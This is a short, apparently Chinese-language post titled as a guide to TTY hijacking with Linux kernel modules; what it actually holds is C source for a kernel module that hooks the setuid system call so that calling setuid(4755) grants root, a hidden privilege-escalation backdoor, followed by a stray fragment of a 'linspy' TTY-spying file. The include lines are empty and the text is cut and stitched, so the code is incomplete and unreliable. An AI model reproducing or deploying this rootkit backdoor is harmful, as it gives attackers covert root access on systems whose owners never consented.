利用linux内核模块实现TTY hijacking dfg
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef NEED_VERSION
static char kernel_version[] = UTS_RELEASE;
#endif
static inline _syscall1(int, setuid, uid_t, uid);/*用_syscall这个系统调用宏来构
建setuid调用*/
extern void *sys_call_table[];/*调出系统调用表*/
void *original_setuid; /*原来的setuid*/ extern int hacked_setuid(uid_t uid)/*我们要替换的setuid*/
{
int i;
if(uid == 4755)
{
current->uid = current->euid = current->gid = current->egid = 0;
/*使当前进程的uid,euid,gid,egid为零*/
return 0;
}
sys_call_table[SYS_setuid] = original_setuid;/*保存原调用*/
i = setuid(uid);
sys_call_table[SYS_setuid] = hacked_setuid;/*替换调用!*/
if(i == -1) return -errno;
else return i;
}
int init_module(void) /*加载*/ {
original_setuid = sys_call_table[SYS_setuid];
sys_call_table[SYS_setuid] = hacked_setuid;
return 0;
}
void cleanup_module(void) /*卸载*/
{
sys_call_table[SYS_setuid] = original_setuid; }
<++> linspy/linspy.c
int errno;
#include
#include